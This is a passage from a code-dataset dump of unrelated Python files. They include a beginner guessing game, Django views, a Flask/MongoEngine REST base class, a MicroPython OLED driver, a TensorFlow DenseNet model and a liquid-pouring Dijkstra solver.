raw_input('Sorry. Guess again: ')\n\t\tif answer == response:\n\t\t\tprint('That is right!')\n\t\telse:\n\t\t\tresponse = raw_input('Sorry. Guess again! (Last Chance): ')\n\t\t\tif answer == response:\n\t\t\t\tprint('That is right!')\n\t\t\telse:\n\t\t\t\tprint('You failed all three times!')\n\t\t\t\tprint('The answer is ' + answer)\n\ndef findActivity():\n\tmessage = 'The recommended activity is '\n\ttemp = int(raw_input('Enter the temperature: '))\n\tif temp > 85: \n\t\tmessage = message + 'swimming'\n\telif temp >= 70:\n\t\tmessage = message + 'tennis'\n\telif temp >= 32:\n\t\tmessage = message + 'golf'\n\telif temp >= 0:\n\t\tmessage = message + 'dancing'\n\telse:\n\t\tmessage = message + 'sitting by the fire' \n\n\tprint(message)\ndef main():\n\t# sampleTest()\n\t# simpleIF()\n\t# ELSE()\n\t# ifELIF()\n\t# guessingGame()\n\tfindActivity()\n\nmain()","sub_path":"other/Decisions.py","file_name":"Decisions.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"160345900","text":"from django.shortcuts import render\nfrom .models import Project,Person,autority,indic\nfrom django.http import HttpResponseRedirect\nfrom random import randint\n# Create your views here.\n\ndef mainpage(request):\n if \"email\" in request.session:\n person=Person.objects.get(email=request.session[\"email\"])\n yetki=autority.objects.all()\n projects=Project.objects.all()\n content={\"projects\":projects,\"person\":person,\"yetki\":yetki}\n return render(request,\"dashboard.html\",content)\n\n else:\n return HttpResponseRedirect('/giris/')\n\n\ndef projectdetail(request,project_slug):\n if \"email\" in request.session:\n person=Person.objects.get(email=request.session[\"email\"])\n yetki=autority.objects.all()\n projects=Project.objects.all()\n say1 = randint(600, 1500)\n say2 = randint(600, 1500)\n say3 = randint(600, 1500)\n proje=Project.objects.get(slug=project_slug)\n indikator=indic.objects.filter(proje=proje)\n\n content={\"projects\":projects,\"person\":person,\"yetki\":yetki,\"proje\":proje,\"say1\":say1,\"say2\":say2,\"say3\":say3,\"indikator\":indikator}\n return render(request,\"proje.html\",content)\n\n else:\n return HttpResponseRedirect('/giris/')\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438214114","text":"import echo\nimport unittest\n\n\nclass MockInterface(object):\n\n\tdef __init__(self):\n\t\tself.player_messages = []\n\n\tdef player_message(self, player, message):\n\t\tself.player_messages.append({\n\t\t\t'player': player,\n\t\t\t'message': message,\n\t\t})\n\n\nclass TestEchoExample(unittest.TestCase):\n\n\tdef should_message_player_with_joined_arguments_of_command(self):\n\t\t# set up the test\n\t\tinterface = MockInterface()\n\t\thandler = echo.EchoCommandHandler(interface)\n\t\tplayer = object()\n\n\t\t# perform some action\n\t\thandler.handle_command(player, 'echo', ['a', 'b', 'c'])\n\n\t\t# validate the resulting output\n\t\tself.assertEqual(1, len(interface.player_messages))\n\t\tself.assert_(interface.player_messages[0]['player'] is player)\n\t\tself.assertEqual('a b c', interface.player_messages[0]['message'])\n","sub_path":"tests/unit/test_echo.py","file_name":"test_echo.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"333662653","text":"import traceback\nfrom datetime import datetime\n\nfrom flask import request\nfrom mongoengine import DoesNotExist, NotUniqueError, ValidationError\n\nfrom flask_restful import Resource\nfrom src import Msg\nfrom src.commons.logger import logger\nfrom src.commons.utils import Schema, validate_schema\n\nmongo_filter_op_map = {\n \">\": \"__gt\",\n \"<\": \"__lt\",\n \">=\": \"__gte\",\n \"<=\": \"__lte\",\n \"!=\": \"__ne\",\n \"==\": \"\",\n \"contains\": \"contains\",\n}\n\n\ndef move_space(data: dict):\n if data:\n for k, v in data.items():\n if isinstance(v, str):\n data[k] = str.strip(v)\n return data\n return {}\n\n\nclass BaseResource(Resource):\n validate_data = None\n validate_schemas = {}\n\n def dispatch_request(self, *args, **kwargs):\n req = None\n schema = None\n if request.method == \"GET\":\n schema = self.validate_schemas.get(\"get\")\n req = request.args.to_dict()\n else:\n schema = self.validate_schemas.get(request.method.lower())\n req = request.json\n if isinstance(schema, Schema):\n data, errors = validate_schema(schema, move_space(req))\n if errors:\n logger.info(str(errors))\n return str(errors), 400\n self.validate_data = data\n try:\n ret = super().dispatch_request(*args, **kwargs)\n return ret\n except NotUniqueError:\n logger.warn(traceback.format_exc())\n return Msg.DATA_EXIST, 400\n except ValidationError as e:\n logger.warn(traceback.format_exc())\n return str(e), 400\n except DoesNotExist:\n logger.warn(traceback.format_exc())\n return Msg.NO_DATA, 400\n except AttributeError as e:\n logger.warn(traceback.format_exc())\n return str(e), 400\n except Exception as e:\n logger.warn(traceback.format_exc())\n return str(e), 400\n\n\nclass MongoModelResource(BaseResource):\n model = None\n args_schema = None\n list_schema = None\n detail_schema = None\n allow_methods = [\"get\", \"post\", \"put\", \"delete\"]\n update_exclude_fields = []\n update_include_fields = []\n list_fields = []\n detail_fields = []\n filter_fields = []\n max_page_size = 100\n default_page_size = 10\n allow_query_all = False\n\n def get_conditions(self):\n filter_conditions = {}\n for filter_field in self.filter_fields:\n column, op, field, convert_fn = filter_field\n value = request.args.get(field)\n if value:\n try:\n if convert_fn.__name__ == 'bool':\n if value == \"true\":\n value = True\n else:\n value = False\n value = convert_fn(value)\n except:\n return (\n \"Cannot convert field {} into {}\".format(\n field, convert_fn.__name__\n ),\n 400,\n )\n operator = mongo_filter_op_map[op]\n filter_conditions[\n \"{column}{operator}\".format(column=column, operator=operator)\n ] = value\n return filter_conditions\n\n def get_queryset(self):\n filter_conditions = self.get_conditions()\n queryset = self.model.objects.only(*self.list_fields).filter(**filter_conditions)\n return queryset\n\n def dispatch_request(self, *args, **kwargs):\n if request.method.lower() not in self.allow_methods:\n return Msg.REQUEST_ERROR, 405\n return super().dispatch_request(*args, **kwargs)\n\n def get(self):\n if request.args.get(\"id\"):\n instance = (\n self.model.objects\n .only(*self.detail_fields)\n .filter(id=request.args.get(\"id\"))\n .first()\n )\n return instance.to_dict()\n try:\n page = request.args.get(\"page\")\n if page:\n page = int(page)\n else:\n page = 1\n except Exception:\n return \"page should be int\", 400\n try:\n page_size = request.args.get(\"page_size\")\n if page_size:\n page_size = int(page_size)\n else:\n page_size = self.default_page_size\n if page_size > self.max_page_size:\n page_size = self.default_page_size\n except Exception:\n return \"page_size should be int\", 400\n queryset = self.get_queryset()\n if self.allow_query_all and page_size == -1:\n page_size = queryset.count()\n pagination = queryset.paginate(page=page, per_page=page_size)\n return {\n \"total\": pagination.total,\n \"pages\": pagination.pages,\n \"page\": pagination.page,\n \"page_size\": pagination.per_page,\n \"results\": [obj.to_dict() for obj in pagination.items],\n }\n\n def post(self):\n instance = self.model(**request.json)\n instance.save()\n return instance.to_dict()\n\n def put(self):\n _id = request.json.pop(\"id\")\n instance = self.model.objects().filter(id=_id).first()\n if not instance:\n return Msg.NO_DATA, 400\n exclude_fields = set(request.json.keys()) & set(self.update_exclude_fields)\n include_fields = set(request.json.keys()) - set(self.update_include_fields)\n if self.update_include_fields and include_fields:\n logger.info(\"Not Allowed To Update \" + str(include_fields))\n return \"Not allowed to update \" + str(include_fields), 400\n if exclude_fields:\n logger.info(\"Not Allowed To Update \" + str(exclude_fields))\n return \"Not allowed to update \" + str(exclude_fields), 400\n\n instance.update_time = datetime.utcnow()\n instance.update(**request.json)\n instance.save()\n\n def delete(self):\n instance = self.model.objects().filter(id=request.json.get(\"id\")).first()\n if not instance:\n return Msg.NO_DATA, 400\n instance.delete()\n","sub_path":"xxw/fraud_api/src/commons/model_resource.py","file_name":"model_resource.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"96579004","text":"'''\r\n2.4.time模块的初体验\r\n\r\nsleep(sec)函数:程序一旦执行到sleep()函数,会立即休眠sec秒,等到时间到了,自动醒过来,然后继续往下执行...\r\n\r\n思路步骤:\r\n\r\n第一步:导入time模块 import time\r\n\r\n第二步:time模块名调用sleep(sec)执行让程序休眠sec秒 time.sleep(5)\r\n\r\n2.5.break&continue关键字\r\n\r\n对于break关键字而言,在循环中一旦遇到了break关键字,立即结束当前循环\r\n\r\n对于continue关键字而言,在循环中一旦遇到了continue关键字,立即结束当次循环,开始下一次循环\r\n\r\n案例:\r\n'''\r\n#演示brak和continue关键字的使用:\r\n# i=1\r\n# while i<11:\r\n# if i==5:\r\n# i+=1\r\n# break\r\n #continue\r\n #和break continue在同一作用范围内,它们的后面不应该定义代码的代码,因为永远不可能被执行到。\r\n #i+=1\r\n # print(i)\r\n # i+=1\r\n# print('-'*8)\r\n\r\n'''\r\n需求:打印1~100的奇数,个数和总和\r\n使用continue关键字参与来实现\r\n'''\r\n# i=1\r\n# while i<= 100:\r\n# if i%2==0:\r\n# i+=1\r\n# continue\r\n# print(i)\r\n# i+=1\r\n\r\n'''\r\n2.6.else语句配合循环使用\r\n\r\n格式:\r\n\r\nelse:\r\n\r\n语句块\r\n\r\n【注意事项】\r\n\r\n如果循环是正常终止,那么else中的语句块一定会被执行\r\n\r\n如果循环��由于break关键字而终止,那么else中的语句块就不会被执行\r\n\r\n案例:\r\n'''\r\n#演示else语句配合循环使用\r\ni=1\r\nwhile i<=10:\r\n if i==5:\r\n break\r\n print(i)\r\n i+=1\r\nelse:\r\n print('只要不碰到牛逼break,我就会被执行...')","sub_path":"第6-10课/python第十课——循环结构收尾.py","file_name":"python第十课——循环结构收尾.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289637260","text":"from machine import Pin, PWM, Timer, I2C, reset\nfrom micropython import const\nimport framebuf\nimport ujson\n\n# How to use this\n# 1. Flash MicroPython on the board\n# 2. ampy -p /dev/ttyUSB0 put main.py\n# 3. Reset the device\n\n# register definitions\nSET_CONTRAST = const(0x81)\nSET_ENTIRE_ON = const(0xa4)\nSET_NORM_INV = const(0xa6)\nSET_DISP = const(0xae)\nSET_MEM_ADDR = const(0x20)\nSET_COL_ADDR = const(0x21)\nSET_PAGE_ADDR = const(0x22)\nSET_DISP_START_LINE = const(0x40)\nSET_SEG_REMAP = const(0xa0)\nSET_MUX_RATIO = const(0xa8)\nSET_COM_OUT_DIR = const(0xc0)\nSET_DISP_OFFSET = const(0xd3)\nSET_COM_PIN_CFG = const(0xda)\nSET_DISP_CLK_DIV = const(0xd5)\nSET_PRECHARGE = const(0xd9)\nSET_VCOM_DESEL = const(0xdb)\nSET_CHARGE_PUMP = const(0x8d)\n\n\nclass SSD1306:\n def __init__(self, width, height, external_vcc):\n self.width = width\n self.height = height\n self.external_vcc = external_vcc\n self.pages = self.height // 8\n self.buffer = bytearray(self.pages * self.width)\n fb = framebuf.FrameBuffer(self.buffer, self.width, self.height, framebuf.MONO_VLSB)\n self.framebuf = fb\n # Provide methods for accessing FrameBuffer graphics primitives. This is a\n # workround because inheritance from a native class is currently unsupported.\n # http://docs.micropython.org/en/latest/pyboard/library/framebuf.html\n self.fill = fb.fill\n self.pixel = fb.pixel\n self.hline = fb.hline\n self.vline = fb.vline\n self.line = fb.line\n self.rect = fb.rect\n self.fill_rect = fb.fill_rect\n self.text = fb.text\n self.scroll = fb.scroll\n self.blit = fb.blit\n self.init_display()\n\n def init_display(self):\n for cmd in (\n SET_DISP | 0x00, # off\n # address setting\n SET_MEM_ADDR, 0x00, # horizontal\n # resolution and layout\n SET_DISP_START_LINE | 0x00,\n SET_SEG_REMAP | 0x01, # column addr 127 mapped to SEG0\n SET_MUX_RATIO, self.height - 1,\n SET_COM_OUT_DIR | 0x08, # scan from COM[N] to COM0\n SET_DISP_OFFSET, 0x00,\n SET_COM_PIN_CFG, 0x02 if self.height == 32 else 0x12,\n # timing and driving scheme\n SET_DISP_CLK_DIV, 0x80,\n SET_PRECHARGE, 0x22 if self.external_vcc else 0xf1,\n SET_VCOM_DESEL, 0x30, # 0.83*Vcc\n # display\n SET_CONTRAST, 0xff, # maximum\n SET_ENTIRE_ON, # output follows RAM contents\n SET_NORM_INV, # not inverted\n # charge pump\n SET_CHARGE_PUMP, 0x10 if self.external_vcc else 0x14,\n SET_DISP | 0x01): # on\n self.write_cmd(cmd)\n self.fill(0)\n self.show()\n\n def poweroff(self):\n self.write_cmd(SET_DISP | 0x00)\n\n def poweron(self):\n self.write_cmd(SET_DISP | 0x01)\n\n def contrast(self, contrast):\n self.write_cmd(SET_CONTRAST)\n self.write_cmd(contrast)\n\n def invert(self, invert):\n self.write_cmd(SET_NORM_INV | (invert & 1))\n\n def show(self):\n x0 = 0\n x1 = self.width - 1\n if self.width == 64:\n # displays with width of 64 pixels are shifted by 32\n x0 += 32\n x1 += 32\n self.write_cmd(SET_COL_ADDR)\n self.write_cmd(x0)\n self.write_cmd(x1)\n self.write_cmd(SET_PAGE_ADDR)\n self.write_cmd(0)\n self.write_cmd(self.pages - 1)\n self.write_data(self.buffer)\n\n\nclass SSD1306_I2C(SSD1306):\n def __init__(self, width, height, i2c, addr=0x3c, external_vcc=False):\n self.i2c = i2c\n self.addr = addr\n self.temp = bytearray(2)\n super().__init__(width, height, external_vcc)\n\n def write_cmd(self, cmd):\n self.temp[0] = 0x80 # Co=1, D/C#=0\n self.temp[1] = cmd\n self.i2c.writeto(self.addr, self.temp)\n\n def write_data(self, buf):\n self.temp[0] = self.addr << 1\n self.temp[1] = 0x40 # Co=0, D/C#=1\n self.i2c.start()\n self.i2c.write(self.temp)\n self.i2c.write(buf)\n self.i2c.stop()\n\n\ni2c = I2C(-1, Pin(4), Pin(5), freq=400000) # Bitbanged I2C bus\nassert 60 in i2c.scan(), \"No OLED display detected!\"\noled = SSD1306_I2C(128, 64, i2c)\noled.invert(0) # White text on black background\noled.contrast(255) # Maximum contrast\noled.fill(0)\noled.show()\n\n##############\nflip = 0\ndata = []\nlogo = (\n \"\\ ||||__ o\",\n \"| \\_/ o \\ o\",\n \"> _ (( <_ o\",\n \"| / \\__+___/\",\n \"|/ |/\",\n \"\",\n \"Sick fish hackin\",\n)\nplaceholder_data = [logo]\nconfig = {\n 'field_id': 'B',\n 'gameplay status': 'disabled',\n 'robot_id': 'A',\n 'target goal color': 'purple',\n}\n\nconfig_json = ujson.dumps(config)\nconfig_package = \"!@#$%s!@#$\" % config_json\n\nfield_jumper = Pin(15, Pin.IN, Pin.PULL_UP)\ngoal_jumper = Pin(13, Pin.IN, Pin.PULL_UP)\nrobot_jumper = Pin(12, Pin.IN, Pin.PULL_UP)\n\n\ndef refresh_config():\n global config, config_json, config_package\n\n config = {\n 'field_id': 'A' if field_jumper.value() else 'B',\n 'gameplay status': 'disabled',\n 'robot_id': 'A' if robot_jumper.value() else 'B',\n 'target goal color': 'blue' if goal_jumper.value() else 'purple',\n }\n\n config_json = ujson.dumps(config)\n config_package = \"!@#$%s!@#$\" % config_json\n\n\ndef render(*_, extra=None):\n global flip, placeholder_data\n\n to_show = data or placeholder_data\n flip = (flip + 1) % len(to_show)\n\n refresh_config()\n\n oled.fill(0)\n\n for i, row in enumerate(to_show[flip]):\n oled.text(row, 0, 8 * i)\n\n if extra:\n oled.text(extra, 0, 8 * (i + 2))\n\n oled.show()\n\n placeholder_data = [\n tuple(\n '{:<8}: {}'.format(k[:8], v) for k, v in config.items()\n )\n ]\n\n\nrender()\n\ntimer_redraw = Timer(1)\ntimer_redraw.init(period=2000, mode=Timer.PERIODIC, callback=render)\n\n\n# if no machine input, kill oled screen, as it blocks flashing\ndef kill(*t):\n global data\n if not data:\n timer_redraw.deinit()\n render(extra=\"FLASHING ALLOW\")\n\n\ntimer_kill = Timer(2)\ntimer_kill.init(period=10000, mode=Timer.ONE_SHOT, callback=kill)\n","sub_path":"notfirmata/esp8266/screen/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"269935942","text":"\"\"\"Contains a variant of the densenet model definition.\n\nImplement two kinds of networks accoring to Densely Connected Convolutional Networks.\n\nThe value of the parameter database_name of the function densenet determines which network is used.\n\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nslim = tf.contrib.slim\n\n\ndef trunc_normal(stddev): return tf.truncated_normal_initializer(stddev=stddev)\n\n\ndef bn_act_conv_drp(current, num_outputs, kernel_size, scope='block'):\n current = slim.batch_norm(current, scope=scope + '_bn')\n current = tf.nn.relu(current)\n current = slim.conv2d(current, num_outputs, kernel_size, scope=scope + '_conv')\n current = slim.dropout(current, scope=scope + '_dropout')\n return current\n\n\n# add a parameter \"bottleneck\" in this function\ndef block(net, layers, growth, bottleneck, scope='block'):\n \n idx = 1\n while idx <= layers :\n \n if bottleneck :\n bnet = bn_act_conv_drp(net, 4 * growth, [1, 1],\n scope=scope + '_conv1x1_' + str(idx))\n idx = idx + 1\n else : \n bnet = net \n \n tmp = bn_act_conv_drp(bnet, growth, [3, 3],\n scope=scope + '_conv3x3_' + str(idx))\n idx = idx + 1\n \n net = tf.concat(axis=3, values=[net, tmp])\n return net\n\n\n\n# add parameters : dataset_name, bottleneck, compression and so on\ndef densenet(images,\n num_classes=1001, is_training=True, \n dataset_name = 'imagenet', layer = 32, \n bottleneck=True, compression=True,\n\t compression_rate = 0.5, \n growth = 24, \n dropout_keep_prob=0.8, \n scope='densenet'):\n \"\"\"Creates a variant of the densenet model.\n\n images: A batch of `Tensors` of size [batch_size, height, width, channels].\n num_classes: the number of classes in the dataset.\n is_training: specifies whether or not we're currently training the model.\n This variable will determine the behaviour of the dropout layer.\n dataset_name: set it to 'imagenet' if you want to use the network for imagenet, otherwise set it to a name that is not 'imagenet'.\n layer: the number of layers in every dense block of the network that is not for imagenet.\n bottleneck: specifies whether or not including bottleneck layers in our network.\n compression: specifies whether or not reducing the number of feature-maps at transition layer.\n compression_rate: specifies the compression factor when compression is True, 0 < compression_rate <= 1\n growth: The number of feature maps each layer (except bottleneck layers) produces in every dense block.\n dropout_keep_prob: the percentage of activation values that are retained.\n scope: Optional variable_scope.\n \n Returns:\n logits: the pre-softmax activations, a tensor of size\n [batch_size, `num_classes`]\n end_points: a dictionary from components of the network to the corresponding\n activation.\n \"\"\"\n #growth = 24\n #compression_rate = 0.5\n\n def reduce_dim(input_feature):\n return int(int(input_feature.shape[-1]) * compression_rate)\n\n end_points = {}\n\n with tf.variable_scope(scope, 'DenseNet', [images, num_classes]):\n with slim.arg_scope(bn_drp_scope(is_training=is_training,\n keep_prob=dropout_keep_prob)) as ssc:\n \n # My code goes here. And several input parameters are added.\n # There are also changes in other functions, like bn_act_conv_drp and block\n ###########This is the start line of my code###############\n \n with slim.arg_scope(densenet_arg_scope(weight_decay=0.0001)) as sc:\n \n if dataset_name == \"imagenet\" :\n # Hopefully debug it later.\n # Before Dense Block 1 : 56 x 56 x 2*growth \n end_point = 'input'\n net = slim.conv2d(images, 2*growth, [7, 7], stride=2, scope=end_point+'_conv_7')\n net = slim.max_pool2d(net, [3, 3], stride=2, scope=end_point+'_pool_2')\n end_points[end_point] = net\n \n # Dense Block 1 : 56 x 56 x growth \n end_point = 'block1' \n net = block(net, 12, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 1 : 56 x 56 x growth or growth*compression_rate if compression is True \n end_point = 'convolution1'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 1 : 28 x 28 x growth or growth*compression_rate if compression is True \n end_point = 'pool1'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 2 : 28 x 28 x growth \n end_point = 'block2' \n net = block(net, 24, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 2 : 28 x 28 x growth or growth*compression_rate if compression is True \n end_point = 'convolution2'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 2 : 14 x 14 x growth or growth*compression_rate if compression is True \n end_point = 'pool2'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 3 : 14 x 14 x growth \n end_point = 'block3' \n net = block(net, 48, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 3 : 14 x 14 x growth or growth*compression_rate if compression is True \n end_point = 'convolution3'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 3 : 7 x 7 x growth or growth*compression_rate if compression is True \n end_point = 'pool3'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 4 : 7 x 7 x growth \n end_point = 'block4' \n net = block(net, 48, growth, bottleneck, scope=end_point)\n end_points[end_point] = net \n \n else :\n # Before Dense Block 1 : 32 x 32 x 16\n end_point = 'input'\n net = slim.conv2d(images, 16, [7, 7], stride=2, scope=end_point+'_conv_7')\n net = slim.max_pool2d(net, [3, 3], stride=2, scope=end_point+'_pool_2')\n net = slim.repeat(net, 12, slim.conv2d, 16, [3, 3], scope=end_point)\n\n end_points[end_point] = net\n \n # Dense Block 1 : 32 x 32 x growth \n end_point = 'block1' \n net = block(net, layer, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 1 : 32 x 32 x growth or growth*compression_rate if compression is True \n end_point = 'convolution1'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 1 : 16 x 16 x growth or growth*compression_rate if compression is True \n end_point = 'pool1'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 2 : 16 x 16 x growth \n end_point = 'block2' \n net = block(net, layer, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 2 : 16 x 16 x growth or growth*compression_rate if compression is True \n end_point = 'convolution2'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 2 : 8 x 8 x growth or growth*compression_rate if compression is True \n end_point = 'pool2'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 3 : 8 x 8 x growth \n end_point = 'block3' \n net = block(net, layer, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Last Convolution \n # imagenet : 7 x 7 x num_classes \n # others : 8 x 8 x num_classes\n end_point = 'lastconvolution'\n net = bn_act_conv_drp(net, num_classes, [1, 1], scope=end_point)\n end_points[end_point] = net\n\n # Global Average Pooling £º 1 x 1 x num_classes\n end_point = 'GlobalPool'\n net = tf.reduce_mean(net, [1, 2], keep_dims=True, name=end_point)\n end_points[end_point] = net\n \n # squeeze\n end_point = 'squeeze'\n logits = tf.squeeze(net, [1, 2], name=end_point)\n end_points[end_point] = logits\n \n # classification\n end_point = \"predictions\" \n end_points[end_point] = slim.softmax(logits, scope=end_point)\n \n\n ###########This is the end line of my code###############\n\n return logits, end_points\n\ndef bn_drp_scope(is_training=True, keep_prob=0.8):\n keep_prob = keep_prob if is_training else 1\n with slim.arg_scope(\n [slim.batch_norm],\n scale=True, is_training=is_training, updates_collections=None):\n with slim.arg_scope(\n [slim.dropout],\n is_training=is_training, keep_prob=keep_prob) as bsc:\n return bsc\n\n# Add biases_initializer\ndef densenet_arg_scope(weight_decay=0.0001):\n \"\"\"Defines the default densenet argument scope.\n\n Args:\n weight_decay: The weight decay to use for regularizing the model.\n\n Returns:\n An `arg_scope` to use for the densenet model.\n \"\"\"\n with slim.arg_scope(\n [slim.conv2d],\n weights_initializer=tf.contrib.layers.variance_scaling_initializer(\n factor=2.0, mode='FAN_IN', uniform=False),\n weights_regularizer=slim.l2_regularizer(weight_decay),\n activation_fn=None, biases_initializer=tf.zeros_initializer(), padding='SAME',\n stride=1) as sc:\n return sc\n\n\ndensenet.default_image_size = 224\n","sub_path":"nets/densenet.py","file_name":"densenet.py","file_ext":"py","file_size_in_byte":12339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"363003357","text":"from optparse import OptionParser\nfrom random import randint\nimport random\nimport sys\nimport io\nimport numpy as np\n#import statprof\n#from contextlib import contextmanager\nimport heapq\n\n\n#@contextmanager\n#def stat_profiler():\n #statprof.start()\n #yield statprof\n #statprof.stop()\n #statprof.display()\n\n\nclass State:\n def __init__(self, i, j, spill, cost):\n self.i, self. j = i, j\n # spill from i to j ( how the state is formed efectively give parent state)\n self.spill = spill\n # n liters to spill from i to j\n self.cost = cost\n # cost of the state\n\nclass ImplicitDijkstra:\n def __init__(self, in_stream):\n n_containers = int(in_stream.readline())\n self.volumes = [int(in_stream.readline()) for _ in range(n_containers)]\n\n self.states = {}\n self.queue = []\n\n\n def pour(self, volumes, prev_cost, i, j):\n new_volumes = list(volumes)\n free = self.volumes[j] - new_volumes[j]\n spill = min(free, new_volumes[i])\n new_volumes[i] -= spill\n new_volumes[j] += spill\n new_volumes = tuple(new_volumes)\n new_cost = (prev_cost[0] + spill, prev_cost[1] + 1)\n new_state = State(i, j, spill, new_cost)\n\n if new_volumes not in self.states or new_state.cost < self.states[new_volumes].cost:\n self.add(new_volumes, new_state)\n return True\n else:\n return False\n\n def add(self, new_volumes, new_state):\n self.states[new_volumes] = new_state\n heapq.heappush(self.queue, (new_state.cost, new_volumes))\n\n def run_dijkstra(self):\n i_fill = max(range(len(self.volumes)), key=self.volumes.__getitem__)\n self.results = (self.volumes[i_fill] + 1) * [None]\n self.n_results = 0\n\n volumes = len(self.volumes) * [0]\n volumes[i_fill] = self.volumes[i_fill]\n volumes = tuple(volumes)\n cost = (0, 0)\n state = State(i_fill, i_fill, self.volumes[i_fill], cost)\n self.add(volumes, state)\n\n while self.queue and self.n_results < len(self.results):\n cost, volumes = heapq.heappop(self.queue)\n state = self.states[volumes]\n if state.cost < cost:\n # skip closed states\n continue\n\n # New states can be obtained only by interacting with vessels that have been changed recently.\n # Should be possible to reduce l to [state.i, state.j], but that way I loose some states, not\n # know why exactly.\n for l in range(len(self.volumes)):\n for k in range(len(self.volumes)):\n if k != l: #state.i and k != state.j:\n self.pour(volumes, cost, l, k)\n #self.pour(volumes, cost, k, l)\n #if k not in {state.i, state.j} and l not in {state.i, state.j}:\n # sys.stderr.write(\"kl: {} {} ij: {} {} volumes: {}\\n\".format(k,l, state.i, state.j, str(volumes)))\n\n # Final distance to current state: check and save results\n if self.results[volumes[state.i]] is None:\n self.results[volumes[state.i]] = volumes\n self.n_results += 1\n\n if self.results[volumes[state.j]] is None:\n self.results[volumes[state.j]] = volumes\n self.n_results += 1\n\n sys.stderr.write(\"#states: {}\\n\".format(len(self.states)))\n\n def get_path(self, volumes):\n path = []\n cost = 0\n state = self.states[tuple(volumes)]\n orig_cost = state.cost\n while state.i != state.j:\n #path.append((state.i, state.j, tuple(volumes)))\n path.append((state.i, state.j))\n cost += state.spill\n volumes[state.i] += state.spill\n volumes[state.j] -= state.spill\n state = self.states[tuple(volumes)]\n assert orig_cost == (cost, len(path))\n return list(reversed(path)), cost\n\n def output_results(self, stream):\n for vol, res in enumerate(self.results[1:]):\n if res is None:\n stream.write(\"{}\\n\".format(vol+1))\n else:\n path, cost = self.get_path(list(res))\n stream.write(\"{} {} {}\\n\".format(\n vol+1, cost, len(path)))\n # for i,j in path:\n # stream.write(\" {}>{}\\n\".format(i, j))\n\ndef solve(in_stream, out_stream):\n dijkstra = ImplicitDijkstra(in_stream)\n dijkstra.run_dijkstra()\n dijkstra.output_results(out_stream)\n\n\ndef make_data(in_stream, problem_size):\n size = problem_size\n max_vol = int( size ** 0.3)\n volumes = []\n while size > 2:\n vol = randint(2, max_vol)\n volumes.append(vol)\n size = size / vol\n problem_setup = io.StringIO()\n problem_setup.write(\"{}\\n\".format(len(volumes)))\n for v in volumes:\n problem_setup.write(\"{}\\n\".format(v))\n\n #sys.stdout.write(problem_setup.getvalue())\n #print(\"====\")\n out_stream = io.StringIO()\n problem_setup.seek(0)\n solve(problem_setup, out_stream)\n\n #sys.stderr.write(out_stream.getvalue())\n #print(\"====\")\n\n #res_stream = StringIO.StringIO()\n #segment.image_to_stream(res_stream, head=False)\n #assert (out_stream.getvalue() == res_stream.getvalue())\n\n in_stream.write(problem_setup.getvalue())\n\n\n'''\nMain script body.\n'''\n\nparser = OptionParser()\nparser.add_option(\"-p\", \"--problem-size\", dest=\"size\", help=\"Problem size.\", default=None)\nparser.add_option(\"-v\", \"--validate\", action=\"store_true\", dest=\"validate\", help=\"program size\", default=None)\nparser.add_option(\"-r\", dest=\"rand\", default=False, help=\"Use non-deterministic algo\")\n\noptions, args = parser.parse_args()\n\n\nif options.rand:\n random.seed(options.rand)\nelse:\n random.seed(options.size)\n\nif options.size is not None:\n make_data(sys.stdout, int(options.size))\nelse:\n solve(sys.stdin, sys.stdout)\n","sub_path":"2019/problems/MINSPILL/minspill.py","file_name":"minspill.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"432245522","text":"#!/usr/bin/python\n\nimport tf\nimport rospy\nfrom gazebo_msgs.msg import 